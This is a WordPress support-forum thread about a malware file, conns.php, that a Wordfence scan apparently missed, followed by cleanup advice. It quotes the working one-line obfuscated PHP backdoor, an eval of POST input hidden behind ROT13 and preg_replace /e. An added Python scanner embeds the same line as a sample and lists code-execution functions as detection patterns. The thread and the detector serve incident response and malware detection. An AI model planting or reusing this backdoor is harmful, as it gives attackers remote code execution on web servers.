• Resolved frank tredici

    (@frank13)


    I manually run WF scans every morning. My WP Multisite got hacked a few weeks ago (even with WF installed and running) and I continue to feel it is vulnerable and has holes in it that WF may be missing.

    Here’s what I found this morning during my morning scan.

    I looked at my server for files added or changed in the past 24 hours. I have been doing this every day since the hack attack.

    There was a foreign file present in the document root of my WP installation called conns.php. It resided at /home/myhost/public_html/conns.php.

    The file looks like this:

    <?php ($www= $_POST['yt']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>

    I then ran my morning WF scan and it was not picked up by WF.

    I deleted this file nonetheless.

    Does anyone know:

    • if my WPMS site is still infected?
    • why WF did not pick up this foreign file not part of WP core?
    • what I should do to further investigate this potential exposure and vulnerability in my WPMS install

    Thank you for helping.

    https://www.ads-software.com/plugins/wordfence/
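
The daily check described in the post above, as an added example (not part of the original thread and not Wordfence's scan logic): it walks a docroot for PHP files modified in the last 24 hours and flags the two traits of the quoted conns.php, a preg_replace pattern carrying the /e modifier and a str_rot13 literal that decodes to a code-execution function name. The function names, the list of flagged functions and the benign sample are assumptions made for this example.

```python
import codecs
import os
import re
import time

# Functions that run code or commands; finding one hidden behind ROT13 is a red flag.
DANGEROUS = {"eval", "assert", "system", "exec", "passthru", "shell_exec"}

# preg_replace() whose quoted pattern carries the "e" (evaluate) modifier,
# e.g. '/ad/e'. PHP removed this modifier in 7.0; older versions still run it.
PREG_E = re.compile(r"""preg_replace\s*\(\s*(['"])([^\w\s\\])(?:(?!\2).)*\2[a-zA-Z]*e[a-zA-Z]*\1""", re.S)
ROT13_LITERAL = re.compile(r"""str_rot13\s*\(\s*(['"])([A-Za-z_]+)\1\s*\)""")
REQUEST_INPUT = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b")


def scan_source(text):
    """Return the reasons a PHP source string looks like an eval-style backdoor."""
    findings = []
    if PREG_E.search(text):
        findings.append("preg_replace with /e modifier")
    for match in ROT13_LITERAL.finditer(text):
        decoded = codecs.decode(match.group(2), "rot_13")
        if decoded.lower() in DANGEROUS:
            findings.append("str_rot13 literal decodes to " + decoded)
    if findings and REQUEST_INPUT.search(text):
        findings.append("reads request input")
    return findings


def scan_recent(root, hours=24, now=None):
    """Scan .php files under root modified within the last `hours` hours."""
    cutoff = (time.time() if now is None else now) - hours * 3600
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower().endswith(".php") and os.path.getmtime(path) >= cutoff:
                with open(path, encoding="utf-8", errors="replace") as handle:
                    findings = scan_source(handle.read())
                if findings:
                    hits[path] = findings
    return hits


# The one-line conns.php quoted in the post, and a constructed benign file.
SAMPLE_BAD = "<?php ($www= $_POST['yt']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');?>"
SAMPLE_OK = "<?php echo preg_replace('/ad/', 'ab', str_rot13($_GET['q'] ?? ''));"

if __name__ == "__main__":
    print(scan_source(SAMPLE_BAD))
    print(scan_source(SAMPLE_OK))
```

Modification times can be reset by whoever wrote the file, so an empty result from `scan_recent` does not by itself show a clean docroot.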

Viewing 14 replies - 1 through 14 (of 14 total)
  • Thread Starter frank tredici

    (@frank13)

    Let me know your thoughts on this Tim. Thanks.

    Can you check the options to see if “Scan files outside your WordPress installation” is checked?

    Also, if you could screenshot the scan options and post a link to the picture here, it might help me make sure nothing is missing.

    tim

    Thread Starter frank tredici

    (@frank13)

    Here you go Tim — screen shot

    Thread Starter frank tredici

    (@frank13)

    removing email notification from this post and deleting plugin from my installation

    I had that conns.php file also and a bunch of HTML files were uploaded to the root of a WP site.

    Has anyone figured out how the conns.php got there yet?

    rchadgray, look in your plugins folder for any suspicious looking plugins that you didn’t install. I had this happen to one of my sites where a bad file kept appearing in the docroot of the site. I’d remove it and it’d appear immediately again. It turns out that one of the plugins was the culprit. It was creating the bad file.

    I just noticed the same thing on my site last night. The file I found that was off was named “wp-cupidony.php”

    Plugin Author WFMattR

    (@wfmattr)

    adambockler:

    If you still have a copy of the file and it was not found in a Wordfence scan, it may be a new type of malware — you can send a copy to samples [at] wordfence.com and we can add it to our scans.

    We also have a guide to cleaning a hacked site, with recommendations on using the deeper scan options, changing passwords, and more, which could help prevent the file from coming back:
    How do I clean my hacked site using Wordfence?

    -Matt R

    I got rid of it already :-/

    Plugin Author WFMattR

    (@wfmattr)

    That’s ok — the guide to cleaning a hacked site (linked above) may still be helpful, since it shows how to do more thorough scans, which may find additional files to clean too, and recommendations on changing passwords and such.

    If you have any trouble running the scans, let us know. If you can open a new post in the forum for any additional issues, that is best since this one was already resolved. Thanks!

    -Matt R

    I found this thread searching Google. I got infected too. I have a copy of the file and will email it to you.

    Nigel

    Plugin Author WFMattR

    (@wfmattr)

    Thank you!

    I just added it to our internal system for inclusion to the scan engine.

    tim
    fb1014

  • The topic ‘WF Scan may have missed a malware PHP script’ is closed to new replies.